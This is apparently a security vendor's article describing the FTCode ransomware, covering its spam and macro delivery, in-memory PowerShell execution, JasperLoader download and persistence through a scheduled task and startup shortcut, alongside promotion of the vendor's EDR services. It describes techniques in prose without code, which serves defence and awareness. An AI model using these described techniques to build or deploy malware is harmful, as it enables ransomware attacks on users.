The ransomware known as FTCode spreads by way of spam emails and can only run its malicious PowerShell payload in memory, never downloading any files to disk. The majority of modern Windows workstations come preinstalled with PowerShell, making it a significantly more dangerous network threat than when it was originally discovered in the wild in 2013.

Infected with the ransomware FTCode?

By installing effective endpoint detection and response (EDR) security software on your endpoints, CYB3R- X, a dependable partner, can assist in defending, mitigating, and eliminating a variety of known and zero-day attacks, such as ransomware like FTCode and advanced persistent threats. When significant incidents occur, CYB3R- X offers an external incident response team that is available round-the-clock, every day of the year.

FTCode: What is it?

FTCode is a type of ransomware that encrypts data and demands a ransom from victims in order to decrypt it. Because it is entirely developed in PowerShell, it can encrypt files on a Windows device without requiring the download of any additional components. To avoid being discovered by antivirus software, FTCode loads its executable code solely into memory, rather than saving it to disk.

Distribution Method for FTCode

The main method of distributing the FTCode ransomware is through spam emails that contain an infected Word template in Italian. In order for a malicious macro to run and execute FTCode PowerShell code, the user must first open the attachment and disable Protected View mode.

The FTCode Malware: How Does It Operate?

The following actions take place once a user is misled into opening the corrupt Word template and the malicious macro runs.

  1. The PowerShell code is loaded into memory by the macro’s DownloadString function rather than being saved to disk. The malicious code is run using the PowerShell iex (invoke expression) command.
  2. In order to download JasperLoader, a backdoor that will download more payloads, FTCode executes a GET request while it is currently operating. The Visual Basic script JasperLoader is located in Windows Indexing Service.vbs in C:UsersPublicLibraries.
  3. In order to run the shortcut after each reboot, it creates a scheduled task named WindowsApplicationService and a shortcut file called WindowsIndexingService.lnk in the user’s starting folder.
  4. When the shortcut is activated, it first looks for files with the.FTCode extension. If any are found, it assumes the computer has already been hacked and terminates.